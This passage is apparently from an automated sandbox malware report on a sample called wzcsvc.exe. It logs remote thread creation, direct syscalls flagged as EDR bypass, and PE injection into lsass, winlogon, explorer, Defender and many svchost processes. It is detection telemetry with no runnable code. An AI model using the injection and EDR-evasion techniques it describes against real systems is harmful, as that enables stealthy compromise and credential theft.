                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E122750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 98582750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 3C5C2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: CFCF2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 8E332750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: A2952750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 340C2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 53792750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 9A0E2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 30B32750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 35DA2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 792F2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: E9172750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 59542750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 1A9A2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 1352750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: D2532750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 532750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 8702750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 44DD2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: B00D2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 9A262750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: B71A2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 82022750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 706E2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 6A4A2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 43F2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 15D32750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: AD5E2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 570C2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: E5262750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 90B2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: B06E2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 9B7A2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: DAEE2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 4F462750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 94902750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 88432750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: E0972750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: E2F62750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 5A1B2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 6F302750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 1CE12750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 81982750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\WerFault.exe EIP: B3BD2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: E26F2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 3D692750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 31DD2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 17AC2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: FE9F2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: FEA22750Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Users\user\Desktop\wzcsvc.exeNtAllocateVirtualMemory: Direct from: 0x7FFB2CEA4B5EJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtProtectVirtualMemory: Direct from: 0x7FF6B5AD20DCJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtAllocateVirtualMemory: Direct from: 0x7FF6B5AD164FJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtAllocateVirtualMemory: Direct from: 0x7FF6B5AD140DJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtSetSecurityObject: Direct from: 0x7FF6B5AD23FCJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtMapViewOfSection: Direct from: 0x7FF6B5AD2023Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtFsControlFile: Direct from: 0x7FF6B5AD2200Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtCreateKey: Direct from: 0x7FF6B5AD23BCJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeNtEnumerateValueKey: Indirect: 0x2616F592922Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtAdjustPrivilegesToken: Direct from: 0x7FF6B5AD2306Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtReadVirtualMemory: Direct from: 0x7FF6B5AD1FA6Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtCreateThreadEx: Direct from: 0x7FF6B5AD2507Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtDelayExecution: Direct from: 0x7FF6B5AD2BECJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtQuerySystemInformation: Direct from: 0x7FF6B5AD2B97Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtQueryInformationProcess: Direct from: 0x7FF6B5AD1215Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtCreateNamedPipeFile: Direct from: 0x7FF6B5AD1C65Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtQuerySystemInformation: Direct from: 0x7FF6B5AD1555Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtClose: Direct from: 0x7FF6B5AD14AA
                Source: C:\Users\user\Desktop\wzcsvc.exeNtCreateKey: Direct from: 0x7FF6B5AD243CJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtCreateThreadEx: Direct from: 0x7FF6B5AD1454Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtQueryInformationProcess: Direct from: 0x7FF6B5AD1177Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtWriteVirtualMemory: Direct from: 0x7FF6B5AD1430Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtReadVirtualMemory: Direct from: 0x7FF6B5AD15A8Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtClose: Direct from: 0x7FF6B5AD18F9
                Source: C:\Users\user\Desktop\wzcsvc.exeNtClose: Direct from: 0x7FF6B5AD161B
                Source: C:\Users\user\Desktop\wzcsvc.exeNtReadFile: Direct from: 0x7FF6B5AD2C4BJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtFsControlFile: Direct from: 0x7FF6B5AD2C8FJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeNtEnumerateValueKey: Indirect: 0x2616F592951Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtProtectVirtualMemory: Direct from: 0x7FF6B5AD20ACJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtQueryInformationToken: Direct from: 0x7FF6B5AD2079Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtClose: Direct from: 0x7FF6B5AD2477
                Source: C:\Users\user\Desktop\wzcsvc.exeNtQueryInformationToken: Direct from: 0x7FF6B5AD22CEJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtAllocateVirtualMemory: Direct from: 0x23EB69F27F1Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtCreateFile: Direct from: 0x7FF6B5AD1FD6Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtClose: Direct from: 0x7FF6B5AD2319
                Source: C:\Users\user\Desktop\wzcsvc.exeNtClose: Direct from: 0x7FF6B5AD20E5
                Source: C:\Users\user\Desktop\wzcsvc.exeNtReadVirtualMemory: Direct from: 0x7FF6B5AD15DFJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtSetValueKey: Direct from: 0x7FF6B5AD246DJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtProtectVirtualMemory: Direct from: 0x7FFB2CE826A1Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtQueryValueKey: Direct from: 0x7FF6B5AD232DJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtCreateThreadEx: Direct from: 0x7FF6B5AD24A2Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtCreateThreadEx: Direct from: 0x7FF6B5AD24E6Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtFsControlFile: Direct from: 0x7FF6B5AD2C28Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeNtDelayExecution: Direct from: 0x7FF6B5AD250FJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1EA0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E120000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1A9A0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\explorer.exe base: 8700000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 212DAEE0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\conhost.exe base: 1EF4F460000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E594900000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 18C88430000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 18FE0970000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1FDE2F60000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2675A1B0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Users\user\Desktop\r8k29DBraE.exe base: 2616F300000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Users\user\Desktop\wzcsapi.exe base: 1CE10000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 21681980000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: unknown base: 2616D010000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\WerFault.exe base: 265B3BD0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE26F0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE3D690000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 25731DD0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\conhost.exe base: 19417AC0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1B0FE9F0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1B0FEA20000 value starts with: 4D5AJump to behavior
                Injects code into the Windows Explorer (explorer.exe)
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: PID: 4056 base: 8700000 value: 4DJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1EA0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E120000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000Jump to behavior
